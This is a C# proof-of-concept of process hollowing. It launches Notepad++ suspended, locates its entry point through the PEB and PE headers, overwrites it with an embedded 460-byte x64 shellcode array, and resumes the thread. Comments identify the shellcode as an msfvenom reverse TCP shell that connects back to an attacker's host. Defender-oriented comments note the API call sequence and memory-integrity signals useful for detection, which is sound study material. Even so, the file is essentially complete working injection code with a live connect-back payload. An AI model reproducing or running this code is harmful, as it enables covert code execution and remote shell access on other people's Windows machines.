using System;
using System.Runtime.InteropServices;
namespace ProcessHollowingPOC
{
// Proof-of-concept of the "process hollowing" technique, 64-bit only (see the 8-byte
// PEB read and BitConverter.ToInt64 below): a legitimate executable is started in the
// suspended state, its PEB is read to locate the mapped image, the image's entry point is
// overwritten with a payload, and the primary thread is then resumed.
// Defender's view: the call sequence in Main — CreateProcess(CREATE_SUSPENDED) ->
// ZwQueryInformationProcess(ProcessBasicInformation) -> ReadProcessMemory(PEB) ->
// WriteProcessMemory(entry point) -> ResumeThread — is the canonical telemetry pattern for
// this technique, and the resulting host process has in-memory code at its entry point
// that no longer matches its on-disk image.
class ProcessHollowingApplication
{ //Local declarations of the Win32 structures passed to the P/Invoke signatures below.
[StructLayout(LayoutKind.Sequential)]
// Used for both the process and the thread attribute arguments of CreateProcess.
public struct SECURITY_ATTRIBUTE
{ public int nLength; public int bInheritHandle; }
[StructLayout(LayoutKind.Sequential)]
// Passed to CreateProcess with every field left at its default (zero) value.
struct STARTUP_INFO
{ public Int32 cb; public Int32 dwX; public Int32 dwY; public Int32 dwXSize; public Int32 dwYSize; public Int32 dwXCountChars; public Int32 dwYCountChars; public Int32 dwFillAttribute; public Int32 dwFlags; public Int16 wShowWindow; public Int16 cbReserved2; public IntPtr lpReserved2; public IntPtr hStdInput; public IntPtr hStdOutput; public IntPtr hStdError; }
[StructLayout(LayoutKind.Sequential)]
// Receives the process and primary-thread handles of the suspended host process.
internal struct PROCESS_INFO
{ public IntPtr hProcess; public IntPtr hThread; public int dwProcessId; }
[StructLayout(LayoutKind.Sequential)]
// Filled by ZwQueryInformationProcess; only PebAddress is consumed by Main.
internal struct PROCESS_BASIC_INFO
{ public IntPtr ExitStatus; public IntPtr PebAddress; public IntPtr BasePriority; public IntPtr UniquePID; public IntPtr InheritedFromUniqueProcessId; }
//Windows API imports ("kernel32.dll" and "ntdll.dll"). ZwQueryInformationProcess is an
//undocumented native API; its use from a managed binary is itself a useful hunting signal.
[DllImport("kernel32.dll")]
static extern bool CreateProcess(string lpApplicationName, string lpCommandLine, ref SECURITY_ATTRIBUTE lpProcessAttributes, ref SECURITY_ATTRIBUTE lpThreadAttributes, bool bInheritHandles, uint dwCreationFlags, IntPtr lpEnvironment, string lpCurrentDirectory, [In] ref STARTUP_INFO lpStartupInfo, out PROCESS_INFO lpProcessInformation);
[DllImport("kernel32.dll")]
static extern uint ResumeThread(IntPtr hThread);
[DllImport("ntdll.dll")]
static extern int ZwQueryInformationProcess(IntPtr hProcess, int procInformationClass, ref PROCESS_BASIC_INFO procInformation, uint ProcInfoLen, ref uint retlen);
[DllImport("kernel32.dll")]
static extern bool ReadProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, [Out] byte[] lpBuffer, int dwSize, out IntPtr lpNumberOfBytesRead);
[DllImport("kernel32.dll")]
public static extern bool WriteProcessMemory(IntPtr hProcess, IntPtr lpBaseAddress, byte[] lpBuffer, Int32 nSize, out IntPtr lpNumberOfBytesWritten);
//Flags: CREATE_SUSPENDED keeps the host's primary thread from running until ResumeThread;
//ProcessBasicInformation (class 0) selects the PROCESS_BASIC_INFORMATION query.
static uint CREATE_SUSPENDED = 0x4; static int ProcessBasicInformation = 0x0;
// Entry point. Performs the whole hollowing sequence in order; no return value of any
// Win32 call is checked, so a failure at any step leaves later steps operating on zeroed
// handles or addresses.
static void Main(string[] args)
{
//Variables and their structures
STARTUP_INFO StartupInformation = new STARTUP_INFO(); PROCESS_INFO ProcessInformation; SECURITY_ATTRIBUTE SecurityAttribute = new SECURITY_ATTRIBUTE();
//Step 1: start the host process suspended. The host is a third-party binary at a fixed
//absolute path; a suspended-then-written-to process of this kind is the first detection hook.
CreateProcess("C:\\Program Files\\Notepad++\\notepad++.exe", null, ref SecurityAttribute, ref SecurityAttribute, false, CREATE_SUSPENDED, IntPtr.Zero, null, ref StartupInformation, out ProcessInformation);
//Step 2: query the process so we can obtain its process environment block (PEB) address.
PROCESS_BASIC_INFO ProcessBasicInfo = new PROCESS_BASIC_INFO();
uint retlen = 0;
ZwQueryInformationProcess(ProcessInformation.hProcess, ProcessBasicInformation, ref ProcessBasicInfo, (uint)(IntPtr.Size * 6), ref retlen);
//Step 3: read 8 bytes at PEB+0x10, which on 64-bit Windows holds ImageBaseAddress
//(the base of the host's mapped executable image).
byte[] Buf = new byte[0x8];
IntPtr NumBytesRead = IntPtr.Zero;
ReadProcessMemory(ProcessInformation.hProcess, ProcessBasicInfo.PebAddress + 0x10, Buf, 0x8, out NumBytesRead);
IntPtr ImageBaseAddress = (IntPtr)BitConverter.ToInt64(Buf, 0);
//Step 4: read the first 0x200 bytes of the image and walk the PE headers to the entry point:
//0x3c is e_lfanew (offset of the NT headers); +0x28 from there is AddressOfEntryPoint in
//IMAGE_OPTIONAL_HEADER64. The resulting RVA is added to the image base.
byte[] Buf2 = new byte[0x200];
ReadProcessMemory(ProcessInformation.hProcess, ImageBaseAddress, Buf2, 0x200, out NumBytesRead);
uint FileAddressOfNewExe = BitConverter.ToUInt32(Buf2, 0x3c);
uint AddressOfEntryPoint = FileAddressOfNewExe + 0x28;
uint EntryPointRelativeVirtualAddress = BitConverter.ToUInt32(Buf2, (int)AddressOfEntryPoint);
IntPtr EntryAddress = (IntPtr)((ulong)ImageBaseAddress + EntryPointRelativeVirtualAddress);
//Payload: raw x64 bytes embedded as a literal. Per the original author this is an msfvenom
//reverse TCP shell back to the attacker's host. Because it is stored unencoded, the
//connect-back endpoint is presumably readable in clear from the compiled binary (msfvenom
//reverse_tcp stubs keep the sockaddr inline — verify), which is why static/YARA scanning of
//the dropper is effective against payloads packaged this way.
byte[] TCPShellcode = new byte[460] {0xfc,0x48,0x83,0xe4,0xf0,
0xe8,0xc0,0x00,0x00,0x00,0x41,0x51,0x41,0x50,0x52,0x51,0x56,
0x48,0x31,0xd2,0x65,0x48,0x8b,0x52,0x60,0x48,0x8b,0x52,0x18,
0x48,0x8b,0x52,0x20,0x48,0x8b,0x72,0x50,0x48,0x0f,0xb7,0x4a,
0x4a,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x3c,0x61,0x7c,0x02,
0x2c,0x20,0x41,0xc1,0xc9,0x0d,0x41,0x01,0xc1,0xe2,0xed,0x52,
0x41,0x51,0x48,0x8b,0x52,0x20,0x8b,0x42,0x3c,0x48,0x01,0xd0,
0x8b,0x80,0x88,0x00,0x00,0x00,0x48,0x85,0xc0,0x74,0x67,0x48,
0x01,0xd0,0x50,0x8b,0x48,0x18,0x44,0x8b,0x40,0x20,0x49,0x01,
0xd0,0xe3,0x56,0x48,0xff,0xc9,0x41,0x8b,0x34,0x88,0x48,0x01,
0xd6,0x4d,0x31,0xc9,0x48,0x31,0xc0,0xac,0x41,0xc1,0xc9,0x0d,
0x41,0x01,0xc1,0x38,0xe0,0x75,0xf1,0x4c,0x03,0x4c,0x24,0x08,
0x45,0x39,0xd1,0x75,0xd8,0x58,0x44,0x8b,0x40,0x24,0x49,0x01,
0xd0,0x66,0x41,0x8b,0x0c,0x48,0x44,0x8b,0x40,0x1c,0x49,0x01,
0xd0,0x41,0x8b,0x04,0x88,0x48,0x01,0xd0,0x41,0x58,0x41,0x58,
0x5e,0x59,0x5a,0x41,0x58,0x41,0x59,0x41,0x5a,0x48,0x83,0xec,
0x20,0x41,0x52,0xff,0xe0,0x58,0x41,0x59,0x5a,0x48,0x8b,0x12,
0xe9,0x57,0xff,0xff,0xff,0x5d,0x49,0xbe,0x77,0x73,0x32,0x5f,
0x33,0x32,0x00,0x00,0x41,0x56,0x49,0x89,0xe6,0x48,0x81,0xec,
0xa0,0x01,0x00,0x00,0x49,0x89,0xe5,0x49,0xbc,0x02,0x00,0x22,
0xb8,0xc0,0xa8,0x00,0x04,0x41,0x54,0x49,0x89,0xe4,0x4c,0x89,
0xf1,0x41,0xba,0x4c,0x77,0x26,0x07,0xff,0xd5,0x4c,0x89,0xea,
0x68,0x01,0x01,0x00,0x00,0x59,0x41,0xba,0x29,0x80,0x6b,0x00,
0xff,0xd5,0x50,0x50,0x4d,0x31,0xc9,0x4d,0x31,0xc0,0x48,0xff,
0xc0,0x48,0x89,0xc2,0x48,0xff,0xc0,0x48,0x89,0xc1,0x41,0xba,
0xea,0x0f,0xdf,0xe0,0xff,0xd5,0x48,0x89,0xc7,0x6a,0x10,0x41,
0x58,0x4c,0x89,0xe2,0x48,0x89,0xf9,0x41,0xba,0x99,0xa5,0x74,
0x61,0xff,0xd5,0x48,0x81,0xc4,0x40,0x02,0x00,0x00,0x49,0xb8,
0x63,0x6d,0x64,0x00,0x00,0x00,0x00,0x00,0x41,0x50,0x41,0x50,
0x48,0x89,0xe2,0x57,0x57,0x57,0x4d,0x31,0xc0,0x6a,0x0d,0x59,
0x41,0x50,0xe2,0xfc,0x66,0xc7,0x44,0x24,0x54,0x01,0x01,0x48,
0x8d,0x44,0x24,0x18,0xc6,0x00,0x68,0x48,0x89,0xe6,0x56,0x50,
0x41,0x50,0x41,0x50,0x41,0x50,0x49,0xff,0xc0,0x41,0x50,0x49,
0xff,0xc8,0x4d,0x89,0xc1,0x4c,0x89,0xc1,0x41,0xba,0x79,0xcc,
0x3f,0x86,0xff,0xd5,0x48,0x31,0xd2,0x48,0xff,0xca,0x8b,0x0e,
0x41,0xba,0x08,0x87,0x1d,0x60,0xff,0xd5,0xbb,0xf0,0xb5,0xa2,
0x56,0x41,0xba,0xa6,0x95,0xbd,0x9d,0xff,0xd5,0x48,0x83,0xc4,
0x28,0x3c,0x06,0x7c,0x0a,0x80,0xfb,0xe0,0x75,0x05,0xbb,0x47,
0x13,0x72,0x6f,0x6a,0x00,0x59,0x41,0x89,0xda,0xff,0xd5};
//Step 5: overwrite the host's entry point with the payload and resume the primary thread so
//the host executes it. The cross-process write into mapped image memory followed by the
//resume of a suspended thread is the decisive pair of events for detection; the host's
//in-memory entry point now differs from its on-disk image, which memory-integrity checks
//can surface after the fact.
WriteProcessMemory(ProcessInformation.hProcess, EntryAddress, TCPShellcode, TCPShellcode.Length, out NumBytesRead);
ResumeThread(ProcessInformation.hThread);
}
}
}